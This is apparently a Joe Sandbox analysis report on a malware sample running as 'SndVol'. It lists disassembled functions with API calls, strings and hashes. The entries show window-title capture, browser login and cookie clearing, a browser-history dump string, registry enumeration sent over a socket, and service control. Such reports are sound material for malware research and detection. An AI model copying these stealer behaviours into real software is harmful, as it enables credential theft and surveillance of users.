Instruction ID: 65f79b4a2c2aed896b4012a4b0ac893fb7d0ccba54e760513c8834f3bef68171
Opcode Fuzzy Hash: 0feee19109755bbb7e48939f97e78712d63acfb534ae43d0cb60b2001d0c131e
Instruction Fuzzy Hash: B4B09B70541740E7CB106BF45C4F9153555B514703B105476B44996151D7B44400C61E

Function 004014AF Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014B9
GetProcAddress.KERNEL32(00000000), ref: 004014C0

Strings

GetLastInputInfo, xrefs: 004014AF
User32.dll, xrefs: 004014B4

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: GetLastInputInfo$User32.dll
API String ID: 2574300362-1519888992
Opcode ID: 6185ad33e38da01c5cedd7fab51ef37947c258832bc82ab0b36b916a7b459740
Instruction ID: ea73ef4d1088e939c140d9431744cb36a9dcab52d5ea7f3e4bb33043e5d41cbe
Opcode Fuzzy Hash: 6185ad33e38da01c5cedd7fab51ef37947c258832bc82ab0b36b916a7b459740
Instruction Fuzzy Hash: 5EB092B45C1700FBCB106FA4AC4E9293AA9A614703B1088ABB845D2162EBB884008F9F

Function 0044A004 Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 0044A08F
__alldvrm.LIBCMT ref: 0044A290
__alldvrm.LIBCMT ref: 0044A2B2

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 4f8832beee02cc7ac8349e43431f1a5ed1ce449240751d3aeed044ff3a2741d2
Instruction ID: 0200e234d7a66e392568480c50467de0d06b46efb2a76a7ba0b74d69ca9a70f2
Opcode Fuzzy Hash: 4f8832beee02cc7ac8349e43431f1a5ed1ce449240751d3aeed044ff3a2741d2
Instruction Fuzzy Hash: 57A166319843869FFB21CF58C8817AEBBA1FF25304F1441AFE9859B382C27D8951C75A

Function 00442801 Relevance: 6.1, APIs: 4, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d454ba49d51131fc87e61242d4279149af29133b98be3a40794271295c3e434
Instruction ID: 497cf8d2f4a88fd96e7f98feeb1d24cd381d204b534fd1f3fd6e485e43360072
Opcode Fuzzy Hash: 8d454ba49d51131fc87e61242d4279149af29133b98be3a40794271295c3e434
Instruction Fuzzy Hash: EA413871A00704BFF324AF79CD41B5EBBA9EB88710F10862FF105DB681E7B999418788

Function 0040C00C Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 103sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32 ref: 0040C021
Sleep.KERNEL32(00001388), ref: 0040C0A9

Strings

[Cleared browsers logins and cookies.], xrefs: 0040C0E4
Cleared browsers logins and cookies., xrefs: 0040C0F5

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: Sleep
String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
API String ID: 3472027048-1236744412
Opcode ID: a2f891f9d224728c04bbb1debadef956fab89d0381d541b8d2862f798e9015da
Instruction ID: fac43f66edf0589ccdcbb227709f1a337e776f7542e83b73a027453bfa593f46
Opcode Fuzzy Hash: a2f891f9d224728c04bbb1debadef956fab89d0381d541b8d2862f798e9015da
Instruction Fuzzy Hash: 2531C804348380E9D6116BF554567AB7B814E93744F08457FB9C42B3D3D97E4848C7AF

Function 004194C4 Relevance: 6.1, APIs: 4, Instructions: 93COMMON

Download Yara Rule

APIs

EnumDisplayMonitors.USER32(00000000,00000000,004195CF,00000000), ref: 004194F5
EnumDisplayDevicesW.USER32(?), ref: 00419525
EnumDisplayDevicesW.USER32(?,?,?,00000000), ref: 0041959A
EnumDisplayDevicesW.USER32(00000000,00000000,?,00000000), ref: 004195B7

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: DisplayEnum$Devices$Monitors
String ID:
API String ID: 1432082543-0
Opcode ID: 87e58e3218148989140d0ffac94925d1ebdf8dad9c36676593952cebb4287d16
Instruction ID: 9f89b1fc864c89aa53311e19646eec67f909338e1adf78e73a6452d568b12732
Opcode Fuzzy Hash: 87e58e3218148989140d0ffac94925d1ebdf8dad9c36676593952cebb4287d16
Instruction Fuzzy Hash: 6F218072108314ABD221DF26DC49EABBBECEBD1764F00053FF459D3190EB749A49C66A

Function 0040A529 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 71sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 0041C551: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041C561
Part of subcall function 0041C551: GetWindowTextLengthW.USER32(00000000), ref: 0041C56A
Part of subcall function 0041C551: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041C594

Sleep.KERNEL32(000001F4), ref: 0040A573
Sleep.KERNEL32(00000064), ref: 0040A5FD

Strings

[ , xrefs: 0040A58F
], xrefs: 0040A57B

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: Window$SleepText$ForegroundLength
String ID: [ $ ]
API String ID: 3309952895-93608704
Opcode ID: 31279ddc9ac779b407beafc78fb4a7c612abc736342ec11431a77cc1334fcb89
Instruction ID: 97bd403738d1ca0cb59e80c1fc79ee6201ed0cb329172f4776a94889a39aca56
Opcode Fuzzy Hash: 31279ddc9ac779b407beafc78fb4a7c612abc736342ec11431a77cc1334fcb89
Instruction Fuzzy Hash: FE119F315043006BC614BB65CC5399F77A8AF50308F40053FF552665E2FF79AA5886DB

Function 0041B7FF Relevance: 6.1, APIs: 4, Instructions: 63timesleepCOMMON

Download Yara Rule

APIs

GetSystemTimes.KERNEL32(?,?,?), ref: 0041B815
Sleep.KERNEL32(000003E8), ref: 0041B820
GetSystemTimes.KERNEL32(?,?,?), ref: 0041B835
__aulldiv.LIBCMT ref: 0041B89C

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: SystemTimes$Sleep__aulldiv
String ID:
API String ID: 188215759-0
Opcode ID: 1460bbf00a7581670417fcbf42b3a1dfd5e2489cdc62901d12e8026d78940c5d
Instruction ID: 72b4c32e7059473e424b83a6cc96647c38f9827b21069785d395d2d8421d6a64
Opcode Fuzzy Hash: 1460bbf00a7581670417fcbf42b3a1dfd5e2489cdc62901d12e8026d78940c5d
Instruction Fuzzy Hash: B0113D7A5083456BD304FAB5CC85DEB7BACEAC4654F040A3EF54A82051FE68EA4886A5

Function 00443A33 Relevance: 6.1, APIs: 4, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26aae147e3b4032e8d822610677c8b44980169b964e3a1f9465f38b9cd56633c
Instruction ID: 17f232e73e96fb976a24982deb7d35e81c220cd9520ca4ef7e8dcf180de91df6
Opcode Fuzzy Hash: 26aae147e3b4032e8d822610677c8b44980169b964e3a1f9465f38b9cd56633c
Instruction Fuzzy Hash: 1301F2B36497067EFA202E786CC1F67220CDF41BBEB34032BB574712D1DA68CE404568

Function 0536C4CC Relevance: 6.1, APIs: 4, Instructions: 63timesleepCOMMON

Download Yara Rule

APIs

GetSystemTimes.KERNEL32(?,?,?), ref: 0536C4E2
Sleep.KERNEL32(000003E8), ref: 0536C4ED
GetSystemTimes.KERNEL32(?,?,?), ref: 0536C502
__aulldiv.LIBCMT ref: 0536C569

Memory Dump Source

Source File: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Offset: 05350000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5350000_SndVol.jbxd

Yara matches

Similarity

API ID: SystemTimes$Sleep__aulldiv
String ID:
API String ID: 188215759-0
Opcode ID: b8bb93d5447286bf8985475e98bb867f7c6088c22b25315fdffcecb7cb36d65f
Instruction ID: 0185fdb4e0a10860a08f25615f962f8d83f6de52f5679914cf2224bf0efb5741
Opcode Fuzzy Hash: b8bb93d5447286bf8985475e98bb867f7c6088c22b25315fdffcecb7cb36d65f
Instruction Fuzzy Hash: B4110073A043496BC304EAB5CC8CDAB77ACEAC5654F048A3DB686C2054FE65DA4886A5

Function 05394700 Relevance: 6.1, APIs: 4, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Offset: 05350000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5350000_SndVol.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26aae147e3b4032e8d822610677c8b44980169b964e3a1f9465f38b9cd56633c
Instruction ID: 9ff7a9f2b42b96a7b2824fbbabf54c42add298eb19ec560583a0daba2d877c3d
Opcode Fuzzy Hash: 26aae147e3b4032e8d822610677c8b44980169b964e3a1f9465f38b9cd56633c
Instruction Fuzzy Hash: ED01A2F62093197EFF282A786CC4F77274EFB466B9B250325B532D11D1DBB08D414165

Function 00443AB2 Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 544fafb264448ea5c1072d449201ab24ccf485d51590c339dd7f80fdded84d3d
Instruction ID: 34d970f17befced98e3ca294e9c9a609e5e7bfbb0444a55afbb34e25ce639c56
Opcode Fuzzy Hash: 544fafb264448ea5c1072d449201ab24ccf485d51590c339dd7f80fdded84d3d
Instruction Fuzzy Hash: 0601A2B26096117EFA111E796CC4E27624CDB81BBF325032BF535612D6DA688E014169

Function 0539477F Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Offset: 05350000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5350000_SndVol.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 544fafb264448ea5c1072d449201ab24ccf485d51590c339dd7f80fdded84d3d
Instruction ID: 01f928b3c513b7b27ca609050f903516d4214a914cdabd10b5e7ed550341839a
Opcode Fuzzy Hash: 544fafb264448ea5c1072d449201ab24ccf485d51590c339dd7f80fdded84d3d
Instruction Fuzzy Hash: B70181FA60921ABEAF5926786CC8D276A4EFF422B43251335B531D11E1DA70CC124161

Function 00448566 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,0044850D,00000000,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue), ref: 00448598
GetLastError.KERNEL32(?,0044850D,00000000,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000,00000364,?,004482E7), ref: 004485A4
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044850D,00000000,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000), ref: 004485B2

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 03982c6842d6040e15a2f529479e2a2fef9fe475335e7dbaf6b0fa49dfb65394
Instruction ID: d5df962f837ff7629ef00c7a8b4dcab40ba3e58d8e4ddb8b40c265455ff02ab4
Opcode Fuzzy Hash: 03982c6842d6040e15a2f529479e2a2fef9fe475335e7dbaf6b0fa49dfb65394
Instruction Fuzzy Hash: AA012832602322FBD7214B289C4495B7798AB50B61B20053AFD05D3241DF34CD01CAE8

Function 00439863 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 0043987A

Part of subcall function 00439EB2: ___AdjustPointer.LIBCMT ref: 00439EFC

_UnwindNestedFrames.LIBCMT ref: 00439891
___FrameUnwindToState.LIBVCRUNTIME ref: 004398A3
CallCatchBlock.LIBVCRUNTIME ref: 004398C7

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
String ID:
API String ID: 2633735394-0
Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
Instruction ID: dcee73c62e3621a690853eebe59cad03ae51e1002f288686f44977c5109bb855
Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
Instruction Fuzzy Hash: 18011732000109BBCF12AF55CC01EDA3BBAEF9D754F04511AFD5861221C3BAE861DBA5

Function 0538A530 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 0538A547

Part of subcall function 0538AB7F: ___AdjustPointer.LIBCMT ref: 0538ABC9

_UnwindNestedFrames.LIBCMT ref: 0538A55E
___FrameUnwindToState.LIBVCRUNTIME ref: 0538A570
CallCatchBlock.LIBVCRUNTIME ref: 0538A594

Memory Dump Source

Source File: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Offset: 05350000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5350000_SndVol.jbxd

Yara matches

Similarity

API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
String ID:
API String ID: 2633735394-0
Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
Instruction ID: 4099fcc9c7cda4ea441b1b345eb351149c8121876d35a05c65888c253590c4d6
Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
Instruction Fuzzy Hash: A0015E32100208BBCF16AF55CC04EEA3BBAFF48724F054116FE5866120D372E9A5DFA0

Function 0536B773 Relevance: 6.0, APIs: 4, Instructions: 45serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0536B2F0,00000000), ref: 0536B782
OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0536B2F0,00000000), ref: 0536B796
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0536B2F0,00000000), ref: 0536B7A3
ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0536B2F0,00000000), ref: 0536B7B2

Memory Dump Source

Source File: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Offset: 05350000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5350000_SndVol.jbxd

Yara matches

Similarity

API ID: Service$Open$CloseControlHandleManager
String ID:
API String ID: 1243734080-0
Opcode ID: bc8933c3fd8e2fa998b2246ab8c72ed9b0f5170f60f0245b371609b51ac54b8f
Instruction ID: f03ba433f047179d3ed639d26a68ed5b0ff8176c9c8f3717c9ec357953bc5087
Opcode Fuzzy Hash: bc8933c3fd8e2fa998b2246ab8c72ed9b0f5170f60f0245b371609b51ac54b8f
Instruction Fuzzy Hash: D3F0CD31600228ABD720AF24AC89EFF3BACEF45A61F000429FD09C2182DB64CD459AA1

Function 004193E3 Relevance: 6.0, APIs: 4, Instructions: 43COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(0000004C), ref: 004193F0
GetSystemMetrics.USER32(0000004D), ref: 004193F6
GetSystemMetrics.USER32(0000004E), ref: 004193FC
GetSystemMetrics.USER32(0000004F), ref: 00419402

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-0
Opcode ID: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
Instruction ID: 9a44d86f369c7068fc2c949f9b02ed5542bf43da40f6b7222f807aea32733f55
Opcode Fuzzy Hash: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
Instruction Fuzzy Hash: DFF0A471B043155BD744EA759C51A6F6BD5EBD4264F10043FF20887281EE78DC468785

Function 0536B717 Relevance: 6.0, APIs: 4, Instructions: 39serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0536B36D,00000000), ref: 0536B720
OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0536B36D,00000000), ref: 0536B735
CloseServiceHandle.ADVAPI32(00000000,?,0536B36D,00000000), ref: 0536B742
StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0536B36D,00000000), ref: 0536B74D

Memory Dump Source

Source File: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Offset: 05350000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5350000_SndVol.jbxd

Yara matches

Similarity

API ID: Service$Open$CloseHandleManagerStart
String ID:
API String ID: 2553746010-0
Opcode ID: 9428b136f56b7ac5d2013585799c428180de648bb4d6702bc273cde58ba3a705
Instruction ID: cd001bda2bfaa3546c8da23c661091722cacd8aac577967dfd7ed8cd9f03325a
Opcode Fuzzy Hash: 9428b136f56b7ac5d2013585799c428180de648bb4d6702bc273cde58ba3a705
Instruction Fuzzy Hash: 76F08275101324AFD611AF20ACD8EFF2B6CEF85AA2B010829F841D2191DB68CD49A9B5

Function 0536C175 Relevance: 6.0, APIs: 4, Instructions: 25COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32(0046CA14,0000000A,00000000), ref: 0536C186
LoadResource.KERNEL32(00000000,?,?,053600AB,00000000), ref: 0536C19A
LockResource.KERNEL32(00000000,?,?,053600AB,00000000), ref: 0536C1A1
SizeofResource.KERNEL32(00000000,?,?,053600AB,00000000), ref: 0536C1B0

Memory Dump Source

Source File: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, Offset: 05350000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5350000_SndVol.jbxd

Yara matches

Similarity

API ID: Resource$FindLoadLockSizeof
String ID:
API String ID: 3473537107-0
Opcode ID: 572f255012f9d3464d264dba9da87f940f43aba7d13ccaaee0753afa8a381888
Instruction ID: 30814b06f0e6637bea813db7501c92ba5312f688f5fbe0bb09f410eb809b47ba
Opcode Fuzzy Hash: 572f255012f9d3464d264dba9da87f940f43aba7d13ccaaee0753afa8a381888
Instruction Fuzzy Hash: B4E01A36200B22EBEB211BA5AC4CD463E39F7C9763B100075FA0696231CA758840DAA8

Function 00438F31 Relevance: 6.0, APIs: 4, Instructions: 14COMMON

Download Yara Rule

APIs

___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00438F31
___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00438F36
___vcrt_initialize_locks.LIBVCRUNTIME ref: 00438F3B

Part of subcall function 0043A43A: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0043A44B

___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00438F50

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
String ID:
API String ID: 1761009282-0
Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
Instruction ID: 04dbcd9d80b8837b95b31ffc0e846904d80335f120ca5f78e3accc67d081205e
Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
Instruction Fuzzy Hash: 59C04C15080781541C50B6B2210B2AE83461E7E38DFD074DFFCE0571038E4E043B653F

Function 00442C5D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 00442CED

Strings

pow, xrefs: 00442CC5, 00442CE2

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: ae0341c24035669086af68b363e9d44c4063f2ceb2f02d621ae22780893f867c
Instruction ID: c2a334fe3ab53b67a82bc2a1da04863f7f1ed5e2a579c87dfbcc8ae8a095d349
Opcode Fuzzy Hash: ae0341c24035669086af68b363e9d44c4063f2ceb2f02d621ae22780893f867c
Instruction Fuzzy Hash: C6516DA1E0420296FB167B14CE4137B2BA4DB40751F704D7FF096823AAEB7D8C859A4F

Function 00413D0D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 135registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00413D46

Part of subcall function 00413A55: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413ABC
Part of subcall function 00413A55: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413AEB

Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36

RegCloseKey.ADVAPI32(00000000,004660A4,004660A4,00466468,00466468,00000071), ref: 00413EB4

Strings

NG, xrefs: 00413E23

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: CloseEnumInfoOpenQuerysend
String ID: NG
API String ID: 3114080316-1651712548
Opcode ID: 55ca8a6ff5107e98a46d62fa6c82dcb4c28fc8089ef9bab0e30cdada37d9f8c1
Instruction ID: 865164b8d80166fcad8b4517e5ed4c9fbafb7c73de3830c3e78154838722fbed
Opcode Fuzzy Hash: 55ca8a6ff5107e98a46d62fa6c82dcb4c28fc8089ef9bab0e30cdada37d9f8c1
Instruction Fuzzy Hash: 0B419E316082405BC324F726DC56AEF72959FD1348F40883FF54A671D2EF7C5949866E

Function 0040404C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93sleepCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066

Part of subcall function 0041B978: GetCurrentProcessId.KERNEL32(00000000,75923530,00000000,?,?,?,?,00466468,0040D20D,.vbs,?,?,?,?,?,004752F0), ref: 0041B99F

Part of subcall function 00418568: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E74), ref: 0041857E
Part of subcall function 00418568: CloseHandle.KERNEL32(t^F,?,?,004040F5,00465E74), ref: 00418587

Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A843), ref: 0041C49E

Sleep.KERNEL32(000000FA,00465E74), ref: 00404138

Strings

/sort "Visit Time" /stext ", xrefs: 004040B2

Memory Dump Source

Source File: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.4408277877.0000000000474000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.4408277877.0000000000478000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SndVol.jbxd

Yara matches

Similarity

API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
String ID: /sort "Visit Time" /stext "
API String ID: 368326130-1573945896
Opcode ID: cda9f1322c07ff16e58388fd2a5f9a53186e38ad3625f603a3d8b01aa45fd49b
Instruction ID: 62b88373b0174ac8ae4090b78ebfd0a8fca35ca34796720d8357018cc2c92f87
Opcode Fuzzy Hash: cda9f1322c07ff16e58388fd2a5f9a53186e38ad3625f603a3d8b01aa45fd49b
